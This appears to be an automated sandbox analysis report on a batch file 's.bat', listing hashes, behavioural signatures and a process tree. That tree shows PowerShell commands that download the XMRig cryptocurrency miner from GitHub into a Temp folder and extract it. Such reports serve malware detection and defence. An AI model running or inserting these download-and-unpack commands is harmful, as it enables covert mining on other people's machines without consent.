Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21-12-2024 15:32
Behavioral task
behavioral1
Sample
s.bat
Resource
win7-20240903-en
General
-
Target
s.bat
-
Size
1KB
-
MD5
f9e0161fac70cf9d9935e2f8d1f1891e
-
SHA1
a6a1efcdb0c9dc7dee578400e7b3e7fc7eda50cc
-
SHA256
1572be5be48b2559b80405a61761e6377ceb81c4b67ffeeeaa9a9819b9e5716a
-
SHA512
e5a2fad1a1b002620dc9d85bf6c041527cb614d9bacaa010f152d3bf39ca8838c55aec18534c19283f751645879b9c1cb7fe7567820093d7ada609a06d893bcf
Malware Config
Signatures
-
pid Process 2192 powershell.exe 2592 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2192 powershell.exe 2592 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2192 powershell.exe Token: SeDebugPrivilege 2592 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2444 wrote to memory of 2192 2444 cmd.exe 31 PID 2444 wrote to memory of 2192 2444 cmd.exe 31 PID 2444 wrote to memory of 2192 2444 cmd.exe 31 PID 2444 wrote to memory of 2592 2444 cmd.exe 32 PID 2444 wrote to memory of 2592 2444 cmd.exe 32 PID 2444 wrote to memory of 2592 2444 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\s.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-msvc-win64.zip -OutFile C:\Users\Admin\AppData\Local\Temp\xmrig-6.22.2-msvc-win64.zip"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Expand-Archive -Path C:\Users\Admin\AppData\Local\Temp\xmrig-6.22.2-msvc-win64.zip -DestinationPath C:\Users\Admin\AppData\Local\Temp\xmrig"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2592
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD55fad143e332684010db9f0da483fc1e9
SHA1d09d6a7ddd03224f6640c2e10dad05e8ba0953bc
SHA25686cd7c83200c65c3946dfa4b19ae20bd5150248bd4a79206a7f6f689360aca8c
SHA51232cecdf9a30fc3ba1df49b420071935ff294b896e385080fa9c9b406551d3bb8b19e58620eab4c6b481daf091ad12209766505c540a6c4ab13b7eace847eee74